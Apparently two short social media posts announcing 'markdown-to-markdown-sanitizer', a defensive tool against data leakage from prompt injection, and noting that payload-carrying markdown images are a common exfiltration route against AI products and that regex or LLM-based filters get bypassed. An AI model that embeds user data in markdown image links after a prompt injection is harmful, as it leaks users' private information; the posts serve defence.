payloads-carrying markdown imgs are the go-to data exfil technique for ai hacking ai flagship products seem to be using regex-based filtering or worse -- they ask the llm both lead to bypasses but markdown rendering can become a hard boundary this is a really cool project!
Releasing `markdown-to-markdown-sanitizer`, a markdown sanitizer focused on avoid information leakage from prompt injection attacks[1]. Creating this was primarily motivated by @simonw's recent post about a Gitlab vulnerability[1]. I think this vulnerability is very widespread